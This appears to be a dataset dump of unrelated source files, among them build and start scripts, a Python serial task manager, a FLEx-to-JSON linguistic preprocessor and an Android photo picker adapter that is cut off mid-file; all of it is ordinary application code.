text stringlengths 1 1.05M |
|---|
<reponame>axyjs/axy-define-asm
"use strict";
exports.runCLI = require("./lib/cli.js").runCLI;
exports.run = require("./lib/api.js").run;
|
#!/bin/bash
set -xe
sudo docker pull grafana/grafana
|
<filename>specs2/src/test/scala/org/http4s/specs2/SilenceOutputStream.scala<gh_stars>0
/*
* Copyright 2021 http4s.org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.http4s.testing
import org.specs2.specification.AroundEach
import org.specs2.execute.{AsResult, Result}
import org.http4s.testing.ErrorReporting._
/** Wraps around each test and silences System.out and System.err output streams.
* Restores back the original streams after each test case.
*/
trait SilenceOutputStream extends AroundEach {
def around[R: AsResult](r: => R): Result =
silenceOutputStreams {
AsResult(r)
}
}
|
import serial
import sys
import threading
import time
import argparse
import struct
import queue
class TaskManager:
def __init__(self, serial_port):
self.serial_port = serial_port
self.task_queue = queue.Queue()
self.serial_connection = serial.Serial(serial_port, baudrate=9600, timeout=1)
def add_task(self, task):
self.task_queue.put(task)
def process_tasks(self):
while True:
if not self.task_queue.empty():
task = self.task_queue.get()
threading.Thread(target=self._process_task, args=(task,)).start()
def _process_task(self, task):
try:
# Perform task processing here
self.serial_connection.write(task.encode())
response = self.serial_connection.readline().decode()
print(f"Task '{task}' processed. Response: {response}")
except Exception as e:
print(f"Error processing task '{task}': {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Task Manager with Serial Communication')
parser.add_argument('port', help='Serial port to communicate with the external device')
args = parser.parse_args()
task_manager = TaskManager(args.port)
# Add tasks to the queue
task_manager.add_task("Task 1")
task_manager.add_task("Task 2")
task_manager.add_task("Task 3")
# Start processing tasks
task_manager.process_tasks() |
<reponame>nkmiura/mw2ape
package br.usp.poli.lta.nlpdep.execute.NLP.output;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.HashMap;
import java.util.LinkedList;
public class NLPOutputList {
private static final Logger logger = LoggerFactory.getLogger(NLPOutputList.class);
private HashMap<Long, NLPOutputResult> outputResults;
public NLPOutputList() {
this.outputResults = new HashMap<>();
}
public synchronized void incrementOutputList (long threadID, Thread thread)
{
if (!this.outputResults.containsKey(threadID)) {
NLPOutputResult newOutputResult = new NLPOutputResult();
//newOutputResult.outputList = new LinkedList<>();
//newOutputResult.parseResult = false;
newOutputResult.setThread(thread);
this.outputResults.put(threadID, newOutputResult);
logger.debug("Iniciando resultados para thread {}",
String.valueOf(threadID));
} else {
logger.debug("Resultados já iniciados para o thread {}.",
String.valueOf(threadID));
}
}
public synchronized void cloneOutputResult (long originalThreadID, long newThreadID) {
if (this.outputResults.containsKey(originalThreadID)) {
if (!this.outputResults.containsKey(newThreadID)) {
NLPOutputResult newOutputResult = new NLPOutputResult();
LinkedList<String> newOutputList = new LinkedList<>();
newOutputList.addAll(this.outputResults.get(originalThreadID).getOutputList());
newOutputResult.setOutputList(newOutputList);
this.outputResults.put(newThreadID, newOutputResult);
logger.debug("Clonando resultados do thread {} para thread {}.",
originalThreadID, newThreadID);
}
} else {
logger.debug("Resultados não existentes para o thread {}.",
String.valueOf(originalThreadID));
}
}
public synchronized void cloneOutputResult (long newThreadID, NLPOutputResult nlpOutputResult) {
if (!this.outputResults.containsKey(newThreadID)) { // a lista ainda não contem dados para a thread
logger.debug("Clonando resultados para ThreadID {} # Dados: {}", newThreadID, String.valueOf(nlpOutputResult.getOutputList()));
NLPOutputResult newOutputResult = new NLPOutputResult();
LinkedList<String> newOutputList = new LinkedList<>();
/*
for (String listElement: nlpOutputResult.getOutputList()) {
String newListElement = listElement;
newOutputList.push(newListElement);
} */
Thread thread = Thread.currentThread();
//newOutputList = (LinkedList) (nlpOutputResult.getOutputList()).clone();
//newOutputList.addAll(nlpOutputResult.getOutputList());
newOutputResult.setOutputList(nlpOutputResult.getOutputList());
newOutputResult.setThread(thread);
newOutputResult.setParseResult(false);
this.outputResults.put(newThreadID, newOutputResult);
logger.debug("Resultados clonados para ThreadId {} - Output list: {}", newThreadID,nlpOutputResult.getOutputList());
} else {
logger.debug("Erro na clonagem de resultados. Já existem dados para a Thread Id {}.", newThreadID,
String.valueOf(nlpOutputResult.getOutputList()));
}
}
public synchronized void setOutputResults(HashMap<Long, NLPOutputResult> outputResults) {
this.outputResults = outputResults;
}
public synchronized boolean insertOutputResult (long threadId, String partialResult) {
if (this.outputResults.containsKey(threadId)) {
//logger.debug(" ### Insert output: ThreadId {} # Before: {} # String add: {}", threadId,
// outputResults.get(threadId).getOutputList(), partialResult);
logger.debug(" ### Insert output: ThreadId {} # String to add: {}", threadId, partialResult);
this.outputResults.get(threadId).getOutputList().addLast(partialResult);
//logger.debug(" ### Insert output: ThreadId {} # Ater: {}", threadId,
// outputResults.get(threadId).getOutputList());
return true;
}
else { return false; }
}
public synchronized LinkedList<String> getOutputResult (long threadID) {
if (this.outputResults.containsKey(threadID)) {
return this.outputResults.get(threadID).getOutputList();
}
else { return null; }
}
public synchronized long getSize()
{
return this.outputResults.size();
}
public synchronized boolean setOutputResult (long threadID, NLPOutputResult nlpOutputResult) {
if (this.outputResults.containsKey(threadID)) {
this.outputResults.put(threadID, nlpOutputResult);
return true;
}
else { return false; }
}
public synchronized boolean setParseResult(long threadId, boolean result) {
if (this.outputResults.containsKey(threadId)) {
this.outputResults.get(threadId).parseResult = result;
return true;
}
else { return false; }
}
public synchronized boolean getParseResult(long threadId) {
if (this.outputResults.containsKey(threadId)) {
return this.outputResults.get(threadId).parseResult.booleanValue();
} else {
return false;
}
}
public synchronized Boolean isAnyThreadAlive() {
Boolean result = false;
for (NLPOutputResult tempNLPOutputResult: this.outputResults.values()) {
if (tempNLPOutputResult.getThread().isAlive()) {
result = true;
break;
}
}
return result;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{ Qtd: ");
sb.append(String.valueOf(outputResults.size() + "\n"));
this.outputResults.forEach(
(threadID, outputResult) ->
{ if (outputResult.parseResult) {
sb.append("ThreadID " + String.valueOf(threadID) + ": ");
sb.append(outputResult.outputList.toString() + "\n");
}
}
);
sb.append('}');
return sb.toString();
}
}
|
<gh_stars>0
import {test} from 'qunit';
import moduleForAcceptance from '../../tests/helpers/module-for-acceptance';
import Sugar from 'ember-sugar-date';
moduleForAcceptance('Acceptance | when index');
test('visiting /', function (assert) {
visit('/');
andThen(function () {
assert.equal(currentURL(), '/');
assert.equal(find('.js-test-sugar-date-full-en-ca').text(),
Sugar.Date.full(new Date(Date.UTC(2001, 8, 11, 12, 46, 40)), 'en-CA'));
});
});
|
const { Message, MessageEmbed } = require("discord.js")
module.exports = {
name : 'hextostring',
description : 'tranlates hex do decimal',
execute(client, message, args) {
let hexString = args[0];
function hexToString(str)
{
const buf = new Buffer.from(str, 'hex');
return buf.toString('utf8');
}
let result = parseInt(hexString, 16);
result = result.toString();
if(result == 'NaN'){
message.reply("your hexadecimal input is invalid!");
return;
}
else{
message.channel.send("Decimal output: " + "`" + result + "`" + "\nString output: " + "`" + hexToString(hexString) + "`");
}
}
} |
#!/bin/bash
#
# Start script for company-appointments.api.ch.gov.uk
APP_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
if [[ -z "${MESOS_SLAVE_PID}" ]]; then
source ~/.chs_env/private_env
source ~/.chs_env/global_env
source ~/.chs_env/company-appointments.api.ch.gov.uk/env
PORT="${COMPANY_APPOINTMENTS_API_PORT}"
else
PORT="$1"
CONFIG_URL="$2"
ENVIRONMENT="$3"
APP_NAME="$4"
source /etc/profile
echo "Downloading environment from: ${CONFIG_URL}/${ENVIRONMENT}/${APP_NAME}"
wget -O "${APP_DIR}/private_env" "${CONFIG_URL}/${ENVIRONMENT}/private_env"
wget -O "${APP_DIR}/global_env" "${CONFIG_URL}/${ENVIRONMENT}/global_env"
wget -O "${APP_DIR}/app_env" "${CONFIG_URL}/${ENVIRONMENT}/${APP_NAME}/env"
source "${APP_DIR}/private_env"
source "${APP_DIR}/global_env"
source "${APP_DIR}/app_env"
fi
exec java ${JAVA_MEM_ARGS} -jar -Dserver.port="${PORT}" "${APP_DIR}/company-appointments.api.ch.gov.uk.jar" |
/* eslint-disable @typescript-eslint/no-unsafe-call */
/* eslint-disable @typescript-eslint/no-unsafe-assignment */
/* eslint-disable @typescript-eslint/ban-ts-comment */
/* eslint-disable react/prop-types */
// @ts-nocheck
import React from 'react';
import { Link } from '../../helpers';
import NavLinks from './nav-links';
import NavLogo from './nav-logo';
import './universal-nav.css';
export interface UniversalNavProps {
displayMenu?: boolean;
fetchState?: { pending: boolean };
toggleDisplayMenu?: React.MouseEventHandler<HTMLButtonElement> | undefined;
user?: Record<string, unknown>;
}
export const UniversalNav = ({
displayMenu,
toggleDisplayMenu,
user,
fetchState
}: UniversalNavProps): JSX.Element => {
return (
<nav className='nav-bar'>
<Link id='' to='/'>
<NavLogo />
</Link>
<NavLinks
displayMenu={displayMenu}
fetchState={fetchState}
toggleDisplayMenu={toggleDisplayMenu}
user={user}
/>
</nav>
);
};
UniversalNav.displayName = 'UniversalNav';
export default UniversalNav;
|
#!/bin/bash
SINCE=$1
RELEASE=$2
BRANCH="${3:-$(git branch --show-current)}"
OUTFILE=$4
docker run --rm=true -it -v "$(pwd)":/usr/local/src/your-app ferrarimarco/github-changelog-generator \
--user pomerium --project pomerium \
-o "${OUTFILE}" \
--no-issues \
--max-issues 500 \
--usernames-as-github-logins \
--release-branch "${BRANCH}" \
--future-release "${RELEASE}" \
--since-tag "${SINCE}" \
--token "${GITHUB_TOKEN}" \
--breaking-label "## Breaking" \
--enhancement-label "## New" \
--bugs-label "## Fixed" \
--pr-label "## Changed" \
--deprecated-label "## Deprecated" \
--removed-label "## Removed" \
--security-label "## Security" \
--cache-file /usr/local/src/your-app/.cache \
--enhancement-labels "improvement,Improvement, enhancement,Enhancement, feature" \
--add-sections '{"documentation":{"prefix":"## Documentation","labels":["docs"]}, "dependency":{"prefix":"## Dependency","labels":["dependency"]}, "deployment":{"prefix":"## Deployment","labels":["deployment"]}}'
|
function newDateFromRef(days) {
return moment('01/01/2015 12:00', 'DD/MM/YYYY HH:mm').add(days, 'd').toDate();
}
module.exports = {
threshold: 0.01,
config: {
type: 'line',
data: {
labels: [newDateFromRef(0), newDateFromRef(1), newDateFromRef(2), newDateFromRef(4), newDateFromRef(6), newDateFromRef(7), newDateFromRef(9)],
fill: false
},
options: {
scales: {
x: {
type: 'time',
},
y: {
display: false
}
}
}
},
options: {
spriteText: true,
canvas: {width: 1000, height: 200}
}
};
|
#!/bin/bash
echo "Starting flume agent : ${FLUME_AGENT_NAME}"
cat "${FLUME_CONF_FILE}"
su-exec "${FLUME_USER}" flume-ng agent \
-c "${FLUME_CONF_DIR}" \
-f "${FLUME_CONF_FILE}" \
-n "${FLUME_AGENT_NAME}" \
-Dflume.root.logger=INFO,console \
-Dflume.monitoring.type=http \
-Dflume.monitoring.port="${FLUME_REPORTING_PORT}" \
-DpropertiesImplementation=org.apache.flume.node.EnvVarResolverProperties |
curl https://backgroundcheck.yourcompany.com/post -k \\
-x __VAULT_PROXY_URL__ \\
-X POST \\
-H "Content-type: application/json" \\
-d '{"ssn": "$VGS_TOKEN"}'
|
<gh_stars>0
/*
Functions for processing flex files into the json format used by the site.
*/
const fs = require('fs');
const util = require('util');
const parseXml = require('xml2js').parseString;
const speakerRegistry = require('./speaker_registry').speakerRegistry;
const tierRegistry = require('./tier_registry').tierRegistry;
const helper = require('./helper_functions');
const flexUtils = require('./flex_utils');
// punct - a string
// return a boolean indicating whether 'punct' should typically appear
// preceded by a space, but not followed by a space, in text
function isStartPunctuation(punct) {
return (punct === "¿") || (punct === "(");
}
// char - a string
// return true if 'char' is used by FLEx as a morpheme separator
function isSeparator(char) {
return (char === "-") || (char === "=") || (char === "~");
}
// word - the data associated with a single word of the source text,
// structured as in FLEx
// return true if the word is tagged as punctuation within FLEx
function isPunctuation(word) {
return word.item[0].$.type === "punct";
}
// metadata - a metadata object
// indexFilePath - a string, the address of the index in the filesystem
// storyID - a string, the unique identifier used for the current interlinear text within the index
// writes the metadata to the index, overwriting any preexisting metadata for this storyID
function updateIndex(metadata, indexFilePath, storyID) {
let index = JSON.parse(fs.readFileSync(indexFilePath, "utf8"));
index[storyID] = metadata;
fs.writeFileSync(indexFilePath, JSON.stringify(index, null, 2));
}
// morphsThisTier - a list of morph tokens,
// where each morph token is an object structured as in FLEx
// wordStartSlot - the timeslot index of the first morph token within its sentence
// wordEndSlot - the timeslot index after the last morph token within its sentence
function concatMorphs(morphsThisTier, wordStartSlot, wordEndSlot) {
let wordMorphsText = '';
let maybeAddCompoundSeparator = false; // never add a separator before the first word
for (let i = wordStartSlot; i < wordEndSlot; i++) {
let nextValue = '***';
if (morphsThisTier[i] != null && morphsThisTier[i]['value'] != null) {
nextValue = morphsThisTier[i]["value"];
// insert missing '-' if needed (FLEX seems to omit them in glosses of affixes)
if (morphsThisTier[i]["tier type"] === 'gls') {
if (morphsThisTier[i]["part of speech"] === 'prefix') {
nextValue = nextValue + '-';
} else if (morphsThisTier[i]["part of speech"] === 'suffix') {
nextValue = '-' + nextValue;
}
}
}
// insert compound-word separator if needed
if (maybeAddCompoundSeparator && !isSeparator(nextValue.substring(0, 1))) {
wordMorphsText += '+';
}
if (!isSeparator(nextValue.substring(-1))) {
maybeAddCompoundSeparator = true;
}
wordMorphsText += nextValue;
}
return wordMorphsText;
}
// word - the data associated with a single word of the source text,
// structured as in FLEx
// returns an object indicating how to represent this word within the
// concatenated sentence text
function getSentenceToken(word) {
const wordValue = flexUtils.getWordValue(word);
let type = 'txt';
if (isPunctuation(word)) {
if (isStartPunctuation(wordValue)) {
type = 'start';
} else {
type = 'end';
}
}
return {'value': wordValue, 'type': type};
}
// sentenceTokens - a list of objects, each indicating how to represent
// one word within the sentence text
// returns the sentence as a string with correct punctuation and spacing
function concatWords(sentenceTokens) {
let sentenceText = "";
let maybeAddSpace = false; // no space before first word
for (const typedToken of sentenceTokens) {
if (maybeAddSpace && (typedToken.type !== "end")) {
sentenceText += " ";
}
maybeAddSpace = (typedToken.type !== "start");
sentenceText += typedToken["value"];
}
return sentenceText;
}
// morphsJson - an object describing the morph tokens in a sentence
// returns an object describing all dependent tiers of the sentence,
// formatted for use by the website
function getDependentsJson(morphsJson) {
const dependentsJson = [];
for (const tierID in morphsJson) {
if (morphsJson.hasOwnProperty(tierID)) {
const valuesJson = [];
for (const start_slot in morphsJson[tierID]) {
if (morphsJson[tierID].hasOwnProperty(start_slot)) {
valuesJson.push({
"start_slot": parseInt(start_slot, 10),
"end_slot": morphsJson[tierID][start_slot]["end_slot"],
"value": morphsJson[tierID][start_slot]["value"]
})
}
}
dependentsJson.push({
"tier": tierID,
"values": valuesJson
});
}
}
return dependentsJson;
}
// FLEx structures morph information by morpheme, so that for example,
// the citation form is clearly associated with all other info about the same
// morpheme, but not clearly associated with the citation forms of other morphs.
// This function repackages the information by type to make it useful for the website.
// morphs - a list of objects describing each morpheme in a part of the source text,
// structured according to FLEx's data format
// tierReg - a tierRegistry object
// startSlot - the timeslot index of the first morpheme within its sentence
// returns an object describing the morphemes, in which descriptors have been
// categorized into "tiers" by information type (e.g. citation form or gloss)
function repackageMorphs(morphs, tierReg, startSlot) {
// FLEx packages morph items by morpheme, not by type.
// We handle this by first re-packaging all the morphs by type(a.k.a. tier),
// then concatenating all the morphs of the same type.
// Repackaging step:
const morphTokens = {};
let slotNum = startSlot;
for (const morph of morphs) {
for (const tier of flexUtils.getMorphTiers(morph)) {
const tierID = tierReg.maybeRegisterTier(tier.$.lang, tier.$.type, true);
if (tierID != null) {
if (!morphTokens.hasOwnProperty(tierID)) {
morphTokens[tierID] = {};
}
morphTokens[tierID][slotNum] = {
"value": flexUtils.getMorphTierValue(tier),
"tier type": tier.$.type,
"part of speech": flexUtils.getMorphPartOfSpeech(morph),
};
}
}
slotNum++;
}
// Concatenating step:
let morphsJson = {};
for (const tierID in morphTokens) {
if (morphTokens.hasOwnProperty(tierID)) {
if (!morphsJson.hasOwnProperty(tierID)) {
morphsJson[tierID] = {};
}
morphsJson[tierID][startSlot] = {
"value": concatMorphs(morphTokens[tierID], startSlot, slotNum),
"end_slot": slotNum
};
}
}
return morphsJson;
}
// dest - an object with all its values nested two layers deep
// src - an object with all its values nested two layers deep
// inserts all values of src into dest, preserving their inner and outer keys,
// while retaining all values of dest except those that directly conflict with src
function mergeTwoLayerDict(dest, src) {
for (const outerProp in src) {
if (src.hasOwnProperty(outerProp)) {
if (!dest.hasOwnProperty(outerProp)) {
dest[outerProp] = {};
}
for (const innerProp in src[outerProp]) {
if (src[outerProp].hasOwnProperty(innerProp)) {
dest[outerProp][innerProp] = src[outerProp][innerProp]; // overwrites dest[outerProp][innerProp]
}
}
}
}
}
// freeGlosses - a list of objects describing the free glosses for a sentence,
// structured as in the FLEx file
// tierReg - a tierRegistry object
// endSlot - the timeslot index of the end of the sentence
// returns an object associating each free gloss with its tier
function repackageFreeGlosses(freeGlosses, tierReg, endSlot) {
const glossStartSlot = 0;
const morphsJson = {};
for (const gloss of freeGlosses) {
const tierID = tierReg.maybeRegisterTier(gloss.$.lang, "free", false);
if (tierID != null) {
if (!morphsJson.hasOwnProperty(tierID)) {
morphsJson[tierID] = {};
}
morphsJson[tierID][glossStartSlot] = {
"value": flexUtils.getFreeGlossValue(gloss),
"end_slot": endSlot
};
}
}
return morphsJson;
}
// sentence - an object describing a sentence of source text,
// structured as in the FLEx file
// speakerReg - a map from speaker names to speaker IDs, which we'll add to if we find a new speaker
// tierReg - a tierRegistry object
// wordsTierID - the ID which has been assigned to the words tier
// hasTimestamps - whether the FLEx file contains a start and end value for each sentence
// returns an object describing the sentence,
// structured correctly for use by the website
function getSentenceJson(sentence, speakerReg, tierReg, wordsTierID, hasTimestamps) {
const morphsJson = {}; // tierID -> start_slot -> {"value": value, "end_slot": end_slot}
morphsJson[wordsTierID] = {}; // FIXME words tier will show up even when the sentence is empty of words
let slotNum = 0;
const sentenceTokens = []; // for building the free transcription
for (const word of flexUtils.getSentenceWords(sentence)) {
const wordStartSlot = slotNum;
// deal with the morphs that subdivide this word
const morphs = flexUtils.getWordMorphs(word);
const newMorphsJson = repackageMorphs(morphs, tierReg, slotNum);
mergeTwoLayerDict(morphsJson, newMorphsJson);
slotNum += morphs.length;
if (morphs.length === 0 && !isPunctuation(word)) {
slotNum++; // if a non-punctuation word has no morphs, it still takes up a slot
}
// deal with the word itself
if (!isPunctuation(word)) {
// count this as a separate word on the words tier
morphsJson[wordsTierID][wordStartSlot] = {
"value": flexUtils.getWordValue(word),
"end_slot": slotNum
};
}
// deal with sentence-level transcription
sentenceTokens.push(getSentenceToken(word));
}
// deal with free glosses
const freeGlosses = flexUtils.getSentenceFreeGlosses(sentence);
const freeGlossesJson = repackageFreeGlosses(freeGlosses, tierReg, slotNum);
mergeTwoLayerDict(morphsJson, freeGlossesJson);
let sentenceText = flexUtils.getSentenceTextIfNoWords(sentence);
if (sentenceText == null) {
sentenceText = concatWords(sentenceTokens)
}
let sentenceJson = {
"num_slots": slotNum,
"text": sentenceText,
"dependents": getDependentsJson(morphsJson),
};
if (hasTimestamps) {
sentenceJson.start_time_ms = flexUtils.getSentenceStartTime(sentence);
sentenceJson.end_time_ms = flexUtils.getSentenceEndTime(sentence);
}
let speaker = flexUtils.getSentenceSpeaker(sentence);
if (speaker != null) {
speakerReg.maybeRegisterSpeaker(speaker);
sentenceJson.speaker = speakerReg.getSpeakerID(speaker);
}
return sentenceJson;
}
// jsonIn - the JSON parse of the FLEx interlinear-text
// jsonFilesDir - the directory for the output file describing this interlinear text
// fileName - TODO delete unused parameter
// isoDict - an object correlating languages with ISO codes
// callback - the function that will execute when the preprocessText function completes
// updates the index and story files for this interlinear text,
// then executes the callback
function preprocessText(jsonIn, jsonFilesDir, fileName, isoDict, callback) {
let storyID = jsonIn.$.guid;
let metadata = helper.improveFLExIndexData(fileName, storyID, jsonIn);
const speakerReg = new speakerRegistry();
metadata['speakers'] = speakerReg.getSpeakersList();
updateIndex(metadata, "data/index.json", storyID);
const jsonOut = {
"metadata": metadata,
"sentences": []
};
let textLang = flexUtils.getDocumentSourceLang(jsonIn);
const tierReg = new tierRegistry(isoDict);
const wordsTierID = tierReg.maybeRegisterTier(textLang, "words", true);
const hasTimestamps = flexUtils.documentHasTimestamps(jsonIn);
for (const paragraph of flexUtils.getDocumentParagraphs(jsonIn)) {
for (const sentence of flexUtils.getParagraphSentences(paragraph)) {
jsonOut.sentences.push(getSentenceJson(sentence, speakerReg, tierReg, wordsTierID, hasTimestamps));
}
}
jsonOut.metadata['tier IDs'] = tierReg.getTiersJson();
jsonOut.metadata['speaker IDs'] = speakerReg.getSpeakersJson();
const prettyString = JSON.stringify(jsonOut, null, 2);
const jsonPath = jsonFilesDir + storyID + ".json";
fs.writeFile(jsonPath, prettyString, function (err) {
if (err) {
console.log(err);
} else {
// console.log("✅ Correctly wrote " + storyID + ".json");
if (callback != null) {
callback();
}
}
});
}
// xmlFilesDir - a directory containing zero or more FLEx files
// jsonFilesDir - a directory for output files describing individual interlinear texts
// isoFileName - the file address of a JSON object matching languages to their ISO codes
// callback - the function that will execute when the preprocess_dir function completes
// updates the index and story files for each interlinear text,
// then executes the callback
function preprocess_dir(xmlFilesDir, jsonFilesDir, isoFileName, callback) {
let isoDict = {};
try {
isoDict = JSON.parse(fs.readFileSync(isoFileName));
} catch (err) {
console.log("Unable to read ISO codes file. Error was " + err + " Proceeding anyway...");
}
const xmlFileNames = fs.readdirSync(xmlFilesDir).filter(f => f[0] !== '.'); // excludes hidden files
// use this to wait for all preprocess calls to terminate before executing the callback
const status = {numJobs: xmlFileNames.length};
if (xmlFileNames.length === 0) {
callback();
}
const whenDone = function () {
status.numJobs--;
if (status.numJobs <= 0) {
callback();
}
};
for (const xmlFileName of xmlFileNames) {
console.log("Processing " + xmlFileName);
const xmlPath = xmlFilesDir + xmlFileName;
fs.readFile(xmlPath, function (err1, xmlData) {
if (err1) throw err1;
parseXml(xmlData, function (err2, jsonData) {
if (err2) throw err2;
const texts = jsonData['document']['interlinear-text'];
// wait for all preprocessText calls to terminate before executing whenDone
const singleFileStatus = {numJobs: texts.length};
const singleTextCallback = function () {
singleFileStatus.numJobs--;
if (singleFileStatus.numJobs <= 0) {
whenDone();
}
};
for (const text of texts) {
preprocessText(text, jsonFilesDir, xmlFileName, isoDict, singleTextCallback);
}
});
});
}
}
module.exports = {
preprocess_dir: preprocess_dir
};
|
package com.walkermanx.photopicker.adapter;
import android.content.Context;
import android.graphics.drawable.Drawable;
import android.os.Build;
import android.util.DisplayMetrics;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.widget.ImageView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.view.ViewCompat;
import androidx.fragment.app.Fragment;
import androidx.recyclerview.widget.RecyclerView;
import com.bumptech.glide.Glide;
import com.bumptech.glide.Priority;
import com.bumptech.glide.RequestManager;
import com.bumptech.glide.load.DataSource;
import com.bumptech.glide.load.engine.GlideException;
import com.bumptech.glide.request.RequestListener;
import com.bumptech.glide.request.RequestOptions;
import com.bumptech.glide.request.target.Target;
import com.walkermanx.photopicker.PhotoPickerActivity;
import com.walkermanx.photopicker.R;
import com.walkermanx.photopicker.entity.Photo;
import com.walkermanx.photopicker.entity.PhotoDirectory;
import com.walkermanx.photopicker.event.OnItemCheckListener;
import com.walkermanx.photopicker.event.OnPhotoClickListener;
import com.walkermanx.photopicker.utils.AndroidLifecycleUtils;
import com.walkermanx.photopicker.utils.MediaStoreHelper;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
/**
* Created by donglua on 15/5/31.
*/
public class PhotoGridAdapter extends SelectableAdapter<PhotoGridAdapter.PhotoViewHolder> {
private LayoutInflater inflater;
public final RequestManager requestManager;
private RequestOptions options;
private OnItemCheckListener onItemCheckListener = null;
private OnPhotoClickListener onPhotoClickListener = null;
private View.OnClickListener onCameraClickListener = null;
public final static int ITEM_TYPE_CAMERA = 100;
public final static int ITEM_TYPE_PHOTO = 101;
private final static int COL_NUMBER_DEFAULT = 3;
private boolean hasCamera = true;
private boolean previewEnable = true;
private boolean hideSelectFrame = false;
private int imageSize;
private int columnNumber = COL_NUMBER_DEFAULT;
private Fragment fragment;
public PhotoGridAdapter(Context context, Fragment fragment, List<PhotoDirectory> photoDirectories) {
this.fragment = fragment;
this.photoDirectories = photoDirectories;
this.requestManager = Glide.with(fragment);
inflater = LayoutInflater.from(context);
setColumnNumber(context, columnNumber);
this.options = new RequestOptions()
.centerCrop()
.dontAnimate()
.override(imageSize, imageSize)
.placeholder(R.drawable.__picker_ic_photo_black_48dp)
.error(R.drawable.__picker_ic_broken_image_black_48dp)
.priority(Priority.HIGH);
}
public PhotoGridAdapter(Context context, Fragment fragment, List<PhotoDirectory> photoDirectories, ArrayList<String> orginalPhotos, int colNum, boolean hideSelectFrame) {
this(context, fragment, photoDirectories);
setColumnNumber(context, colNum);
selectedPhotos = new ArrayList<>();
if (orginalPhotos != null) {
selectedPhotos.addAll(orginalPhotos);
}
this.hideSelectFrame = hideSelectFrame;
}
private void setColumnNumber(Context context, int columnNumber) {
this.columnNumber = columnNumber;
WindowManager wm = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE);
DisplayMetrics metrics = new DisplayMetrics();
wm.getDefaultDisplay().getMetrics(metrics);
int widthPixels = metrics.widthPixels;
imageSize = widthPixels / columnNumber;
}
@Override
public int getItemViewType(int position) {
return (showCamera() && position == 0) ? ITEM_TYPE_CAMERA : ITEM_TYPE_PHOTO;
}
@NonNull
@Override
public PhotoViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
final View itemView = inflater.inflate(R.layout.__picker_item_photo, parent, false);
final PhotoViewHolder holder = new PhotoViewHolder(itemView);
if (viewType == ITEM_TYPE_CAMERA) {
holder.vSelected.setVisibility(View.GONE);
holder.ivPhoto.setScaleType(ImageView.ScaleType.CENTER);
holder.ivPhoto.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
if (onCameraClickListener != null) {
onCameraClickListener.onClick(view);
}
}
});
} else {
holder.vSelected.setVisibility(hideSelectFrame ? View.GONE : View.VISIBLE);
}
return holder;
}
private void onPhotoLoadCompleted(PhotoViewHolder holder) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
// Call startPostponedEnterTransition only when the 'selected' image loading is completed.
if (PhotoPickerActivity.currentPosition != holder.getAdapterPosition()) {
return;
}
if (holder.enterTransitionStarted.getAndSet(true)) {
return;
}
fragment.startPostponedEnterTransition();
}
}
@Override
public void onBindViewHolder(@NonNull final PhotoViewHolder holder, int position) {
if (getItemViewType(position) == ITEM_TYPE_PHOTO) {
List<Photo> photos = getCurrentPhotos();
final Photo photo;
if (showCamera()) {
photo = photos.get(position - 1);
} else {
photo = photos.get(position);
}
// Set the string value of the image resource as the unique transition name for the view.
ViewCompat.setTransitionName(holder.ivPhoto, photo.getPath());
boolean canLoadImage = AndroidLifecycleUtils.canLoadImage(holder.ivPhoto.getContext());
if (canLoadImage) {
requestManager.load(new File(photo.getPath()))
// .centerCrop()
// .dontAnimate()
.thumbnail(0.5f)
// .override(imageSize, imageSize)
// .placeholder(R.drawable.__picker_ic_photo_black_48dp)
// .error(R.drawable.__picker_ic_broken_image_black_48dp)
.apply(options)
.listener(new RequestListener<Drawable>() {
@Override
public boolean onLoadFailed(@Nullable GlideException e, Object model,
Target<Drawable> target, boolean isFirstResource) {
onPhotoLoadCompleted(holder);
return false;
}
@Override
public boolean onResourceReady(Drawable resource, Object model, Target<Drawable>
target, DataSource dataSource, boolean isFirstResource) {
onPhotoLoadCompleted(holder);
return false;
}
})
.into(holder.ivPhoto);
}
if (!hideSelectFrame) {
final boolean isChecked = isSelected(photo);
holder.vSelected.setSelected(isChecked);
holder.ivPhoto.setSelected(isChecked);
holder.vSelected.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
int pos = holder.getAdapterPosition();
boolean isEnable = true;
if (onItemCheckListener != null) {
isEnable = onItemCheckListener.onItemCheck(pos, photo,
getSelectedPhotos().size() + (isSelected(photo) ? -1 : 1));
}
if (isEnable) {
toggleSelection(photo);
notifyItemChanged(pos);
}
}
});
}
holder.ivPhoto.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
if (onPhotoClickListener != null) {
int pos = holder.getAdapterPosition();
if (previewEnable) {
onPhotoClickListener.onClick(view, pos, showCamera());
} else {
if (hideSelectFrame) {
if (onItemCheckListener != null) {
onItemCheckListener.onItemCheck(pos, photo, 0);
}
} else {
holder.vSelected.performClick();
}
}
}
}
});
} else {
holder.ivPhoto.setImageResource(R.drawable.__picker_camera);
}
}
@Override
public int getItemCount() {
int photosCount = photoDirectories.size() == 0 ? 0 : getCurrentPhotos().size();
if (showCamera()) {
return photosCount + 1;
}
return photosCount;
}
public static class PhotoViewHolder extends RecyclerView.ViewHolder {
private ImageView ivPhoto;
private View vSelected;
private AtomicBoolean enterTransitionStarted;
public PhotoViewHolder(View itemView) {
super(itemView);
ivPhoto = itemView.findViewById(R.id.iv_photo);
vSelected = itemView.findViewById(R.id.v_selected);
enterTransitionStarted = new AtomicBoolean();
}
}
public void setOnItemCheckListener(OnItemCheckListener onItemCheckListener) {
